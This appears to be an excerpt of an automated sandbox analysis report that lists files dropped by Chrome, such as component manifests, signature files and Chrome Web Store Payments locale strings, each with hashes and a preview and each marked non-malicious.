                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiSUxrUllPSmhIVEZacllLRmN5UC12SkJrVjNWbWVLdHo4d1hEb2VPWjBZMCJ9LHsicGF0aCI6InNzbF9lcnJvcl9hc3Npc3RhbnQucGIiLCJyb290X2hhc2giOiJyRFZLUnlPcXBQQnI3RGhkM2VTazBKZzYxUlJXOVNzeHFBYU95WDFiWHFjIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiZ2lla2NtbWxua2xlbmxhb21wcGtwaGtuam1ubnBuZWgiLCJpdGVtX3ZlcnNpb24iOiI3IiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"nBdNk-7bgnEftAs4hWaHwF1Lk9pt7Eh6pcqe2gyNsE7VnVRp-H27tm1RFAF4htCUlXNJxX6YY-MUiK2DqJpQ3c73KDaFV8DcnadQfcXO3Lbrw7jLYSUaSdzujPkTyhuFcq_BhK0KWiIJ0aJgh7nVOBfAa5AbE6oFlLKMB2Ls0gmzS1-a5hUIu4rw2h9r9jkr6gLYbein5Jk2hdwW3u-1GNjyki4dftG2iZNAI8VhUf5gnCiF4AHCnYSGJsM0RGkmO_HJIzgwpQpP3RDsG2ioeKgxL-kcHhjXWOj3uVGyxpp1FkyHGkeGuqpFZMAxx3CEBiOtFj7i3iQxkgEW-E3uMKI3yA

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_821393512\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.9570514164363635
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SVCBGERJd9WaHpYx4eiXoA:SVCwERJdVMiXd
                                                                                                                                                            MD5:C6ABF42CB5AF869629971C2E42A87FD5
                                                                                                                                                            SHA1:6EB0FAE28D9466E76FA12E31FE6CDADD3ACCE4D1
                                                                                                                                                            SHA-256:D281AFDA759075F4CB7D7CEEC4A3CB2AF135213B4D691F27090E13F238486AD1
                                                                                                                                                            SHA-512:EDDF7E4883E82718743C589E8F2E48BEAD948428E730231FEFADAD380853343332BC56C9DC61C963B3F537CD4865B06FF330CEF012B152CEA35F8A0AA2C7B56D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.fd515ec0dc30d25a09641b8b83729234bc50f4511e35ce17d24fd996252eaace

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_821393512\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):76
                                                                                                                                                            Entropy (8bit):4.169145448714876
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFY8Wypv/KS1f:F6VlMQyBSS1f
                                                                                                                                                            MD5:4AAA0ED8099ECC1DA778A9BC39393808
                                                                                                                                                            SHA1:0E4A733A5AF337F101CFA6BEA5EBC153380F7B05
                                                                                                                                                            SHA-256:20B91160E2611D3159AD82857323FEBC906457756678AB73F305C3A1E399D18D
                                                                                                                                                            SHA-512:DFA942C35E1E5F62DD8840C97693CDBFD6D71A1FD2F42E26CB75B98BB6A1818395ECDF552D46F07DFF1E9C74F1493A39E05B14E3409963EFF1ADA88897152879
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "sslErrorAssistant",. "version": "7".}

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_821393512\ssl_error_assistant.pb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2816
                                                                                                                                                            Entropy (8bit):6.108955364911366
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:jkbh6AW2Bfc3osI6Hc3+XgU+EVeY55J4gXM/QDH4yq2dxckdfmkM:jkbhM2a3pntgQVb8Ylq2di
                                                                                                                                                            MD5:E2F792C9E2DD86F39E8286B2EAD2FC70
                                                                                                                                                            SHA1:8A32867614D2A23E473ED642056DED8E566687F9
                                                                                                                                                            SHA-256:AC354A4723AAA4F06BEC385DDDE4A4D0983AD51456F52B31A8068EC97D5B5EA7
                                                                                                                                                            SHA-512:6A7AF0CA1EFA65A89A9CA3B8DF0D2E24F21D91673C60CDFEEB02D33647442B01D535497249542F40E66E0D2DD3E9F8ED1F4A201FD97138D07A2B71366737E580
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...5.3sha256/fjZPHewEHTrMDX3I1ecEIeoy3WFxHyGplOLv28kIbtI=.5.3sha256/m/nBiLhStttu1YmOz7Y3D2u1iB1dV2CbIfFa3R2YW5M=.5.3sha256/8Iuf4xRbVCmCMQTJn3rxlglIO1IOKoyuSUgmXyfaIKs=.5.3sha256/8IHdrS+r6IWzSMcRcD/GA6mBxk1ECX8tGRW0rtGWILE=.5.3sha256/k/2eeJTznE32mblA/du19wpVDSIReFX44M8wXa2JY30=.5.3sha256/urWd7jMwR6DJgvWhp6xfRHF5b/cba3iG0ggXtTR6AfM=.5.3sha256/IJPCDSE5tM9H3nuD5m6RU2i9KDdPXVn4qmC/ULlcZzc=.5.3sha256/0Gy8RMdbxHNWR2GQJ62QKDXORYf5JmMmnr1FJFPYpzM=.5.3sha256/8tTICtyaxIQrdbYYDdgZhTN0OpM9kYndvoImtw1Ys5E=.5.3sha256/F7HIlsaG0bpJW8CzYekRbtFqLVTTGqwvuwPDqnlLct0=.5.3sha256/zaV2Aw1A742R1+WpXWvL5atsJbGmeSS6dzZOfe6f1Yw=.5.3sha256/UwOkRGMlP0K/mKNJdpQ0sTg2ean9Tje8UTOvFYzt1GE=.5.3sha256/w7KUXE4/BAo1YVZdO3mBsrMpu4IQuN0mhUXUI//agVU=.5.3sha256/JnPvGqEn36FjHQlBXtG1uWwNtdMj1o2ojR/asqyypNk=.5.3sha256/AUSXlKDCf1X30WhWeAWbjToABfBkJrKWPL6KwEi5VH0=.5.3sha256/zSyVjjFJMIeXK0ktVTIjewwr6U5OePRqyY/nEXTI4P8=.5.3sha256/9dcHlrXN2WV/ehbEdMxMZ8IV4qvGejCtNC5r6nfTviM=.5.3sha256/E+0WZLGSIe5nddlVKZ5fYzaNHHCE3hNqi/OWZD3iKgA=.5.3sha2

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_897717929\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1311
                                                                                                                                                            Entropy (8bit):6.005142745622942
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pZRj/flTDyV9yVmddLb7aoX6wcIWQ4vDzRS9KF6oXZEWGPnIQvo+M:p/haEAdV7ak63Rx0KF6keWiI6o+M
                                                                                                                                                            MD5:015CC8BEA4A6A775AF3080882F5D9455
                                                                                                                                                            SHA1:E3728A7B6A32044FDACE9F7FC447997FDE32FB18
                                                                                                                                                            SHA-256:DCD27659E8C9BE4F9130B1CAA328162D305544D9799EF0A0675085A962CF7578
                                                                                                                                                            SHA-512:F6C8FEC2DEB717F361E77117F6FEABBF9B26EACE7402957D7D312F334A82176AD44DAC1A4124AF004C7CA6F3F6B73124740289B9570A85354DB3C1047751F237
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiZWJkaGhpRGxDcEhFOUc5RllLMEZTQ1B4RmFBOXBWMVdVYzdPaUVPSlpZSSJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Imxsa2dqZmZjZHBmZm1oaWFrbWZjZGNibG9oY2NwZm1vIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjAuMTMiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"YQ3bA-EV7C3PaG_SnIbfTSwU1AwZtGpsZ6QFPw-_VbUhBWySX2efppu8GX0fliZRHW6KEP7fjynCV_qNtcgrpl8BjSO-1nmB1KrigfT4kHv6uBh8h_SXujgGRjIPAXCWPLYKco-hqE9tTuQPKmzn_-Zc9GgJpl5lEAsu6UTzjrvVmzKkgkbdcesMNSwbrvyDffx2nikl2p_7U3IkHNyd7hLpsCvZV8VqwCHwC6pOuggw5kmNjLwxmRnjA_Emy9mMXEUEofyh7EEOs9BaUNsokg7qXuxkrMz4S0ja5VB6ZVmBO5Wlvexk3EXD-yDCykgMDxk2WZGpW1JtkYnpOMqgGQ"},{"header":{"kid":"webstore"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"W9LRESuiylidkd-XDuFWN18wHXTE2O2h4LMHy

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_897717929\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.947126840193127
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SuOcV6oDkEoVavUd1iSiXn:SBCDk5svU6SiX
                                                                                                                                                            MD5:072D0D7C824A2889BEB0B9CEF0FD2197
                                                                                                                                                            SHA1:985C0EC750CFFBBAE6B2F079E77149E434E9D517
                                                                                                                                                            SHA-256:BF69E3FA772C505E6E75E2A5086FF0396248246F319024745B80FC0FB39D93E7
                                                                                                                                                            SHA-512:A397B48EE93B964A38501846F876ABF2C29AF2150786DCF6E37BAA0EADF48DEE2F8601953F8AB7D4AD76CB5586D669CB1F11FF5A8FDE5B638F0B91413B358C03
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.ab8d70a60ce0fba1355fad4edab88fd4d1bccc566b230998180183d1d776992b

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_897717929\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):300
                                                                                                                                                            Entropy (8bit):4.716626192856269
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:zeXC6WQpVyTJCAEIfd26VO9bIA6VDHs/C6wrhKXk7Vm01LwyAGI/zqSkhY:0eTJCAEQLO9hQADgK0711LqGika
                                                                                                                                                            MD5:9569E205D5815A3D9E14DEE93B7717C3
                                                                                                                                                            SHA1:020BD6A07EF64A304B07E3ADFDA4C4D5397534CD
                                                                                                                                                            SHA-256:79B7618620E50A91C4F46F4560AD054823F115A03DA55D5651CECE8843896582
                                                                                                                                                            SHA-512:BE5EB17E769203E6A064326F227D21FFC1E8AA3F2684BD9786FAA4D0EAC944E4343608B1AEA25FDA15FFF88D9C41487907037FEF75DC4D1615A27C7041FC0F9C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "description" : "Origin Trials public key updates and disabled features list",. "manifest_version" : 2,. "minimum_chrome_version" : "55",. "name" : "Origin Trials Updates",. "origin-trials" : null,. "update_url" : "https://clients2.google.com/service/update2/crx",. "version" : "1.0.0.13".}

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):248531
                                                                                                                                                            Entropy (8bit):7.963657412635355
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                            MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                            SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                            SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                            SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\c0c16f7d-4a0f-4b81-a5b2-9ffbd1fd869b.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):796
                                                                                                                                                            Entropy (8bit):4.864931792423268
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                                                                                                                            MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                            SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                            SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                            SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):675
                                                                                                                                                            Entropy (8bit):4.536753193530313
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                                                                                                                            MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                            SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                            SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                            SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):641
                                                                                                                                                            Entropy (8bit):4.698608127109193
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
                                                                                                                                                            MD5:76DEC64ED1556180B452A13C83171883
                                                                                                                                                            SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                                                                                                                            SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                                                                                                                            SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):624
                                                                                                                                                            Entropy (8bit):4.5289746475384565
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
                                                                                                                                                            MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                                                                                                                            SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                                                                                                                            SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                                                                                                                            SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):651
                                                                                                                                                            Entropy (8bit):4.583694000020627
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
                                                                                                                                                            MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                                                                                                                            SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                                                                                                                            SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
                                                                                                                                                            SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):787
                                                                                                                                                            Entropy (8bit):4.973349962793468
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
                                                                                                                                                            MD5:05C437A322C1148B5F78B2F341339147
                                                                                                                                                            SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                                                                                                                            SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                                                                                                                            SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):593
                                                                                                                                                            Entropy (8bit):4.483686991119526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                            MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                            SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                            SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                            SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):593
                                                                                                                                                            Entropy (8bit):4.483686991119526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                            MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                            SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                            SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                            SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

